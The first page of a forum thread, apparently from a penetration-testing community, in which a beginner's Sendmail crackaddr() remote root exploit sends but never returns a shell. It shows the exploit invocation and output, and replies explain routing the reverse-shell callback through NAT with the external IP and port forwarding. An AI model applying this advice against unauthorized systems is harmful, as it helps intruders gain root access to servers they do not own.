Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: remote exploit bug

  1. #1
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    Default remote exploit bug

    hello
    i'm a starter in linux security.
    i am now trying to exploit the crackaddr() bug in the sendmail 8.10.x versions.

    here's how it goes:


    --------------------------------
    vreezver@Linux:[$] ./exploit <target_ip> <my_ip> <targer_number>
    # target number here is 0

    Sendmail <8.12.8 crackaddr() exploit by bysin
    from the l33tsecurity crew

    Resolving address... Address found
    Connecting... Connected!
    Sending exploit... Exploit sent!
    Waiting for root prompt... # instead of getting a shell prompt nothing happens.

    vreezver@Linux:[$]
    -------------------------------------------------------
    i'm working through a lan and getting access to the intrenet from a server

    - maybe this root prompt less is due to a firewall blocking

    -maybe i should use my extern ip address instead of the one i am using inside the lan

    i'd like to know what is the real trouble
    i am using a Linux/Knoppix 5.1.1 version based on a 2.6.19 kernel.

    thanx for reponding me
    Edited by -=Xploitz=-
    thanx

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    vreezver

    There is no need to post your e-mail address. If they know the answer, or want to offer you hints,.... they will. They will post it publicly here so that all may see and learn from it. Your not special.

    Thanks.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    Default

    ok i didnt mean to look special
    i prefer them to respond publicly
    thanx

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    No worries.

    Just remember for next time.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by vreezver View Post
    --------------------------------
    vreezver@Linux:[$] ./exploit <target_ip> <my_ip> <targer_number>
    # target number here is 0

    Sendmail <8.12.8 crackaddr() exploit by bysin
    from the l33tsecurity crew

    Resolving address... Address found
    Connecting... Connected!
    Sending exploit... Exploit sent!
    Waiting for root prompt... # instead of getting a shell prompt nothing happens.
    -------------------------------------------------------
    i'm working through a lan and getting access to the intrenet from a server

    - maybe this root prompt less is due to a firewall blocking
    Could be.
    -maybe i should use my extern ip address instead of the one i am using inside the lan
    If you're trying to connect to an external IP you'll need to provide your external IP (since from the outside looking in your internal IP isn't reachable....you might wanna read RFC 1918 and brush up on some IP routing information). However, if you're connecting to an External IP you better be sure you have written permission.

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    If your using knopix as your attack machine this really has nothing to do with backtrack. The problem is most likely the service is not vunerable. this happens because of updates or wrong version. If your sure the version is exploitable then the next issue is usually your router or server. you must be clear on which port your exploit is returning on and foorward it to your attack machine. for example if I send a exploit and it sends back a reverse shell on port 5000 then port 5000 on my firewalled router must be forwarded to the internal ip of my attack machine. If you are exploiting across the net then yes you should be using your external IP. if you send a command to reurn on 192.168.1.100 then that's not going to work for obvious reasons.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    Default

    ok.thanks Torin,
    but what i am saying is that i m getting a remote shell without being able to access it. what could be the problem?

  8. #8
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    Default

    If your sure the version is exploitable then the next issue is usually your router or server
    ok. purehate, we did have already realised it but with no assurance ; we think it ts a router problem.

    you must be clear on which port your exploit is returning on and foorward it to your attack machine.
    so you mean i "should be clear" in my source on the returning port right?

  9. #9
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Uh earlier you said no shell.
    "instead of getting a shell prompt nothing happens."
    So which is it?

  10. #10
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    16

    Default

    uh...
    the exploit worked successfully
    and prints out : <<exploit sent>>
    and then << waiting for root prompt>>

    this means the root was sent but we didnt receive it

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •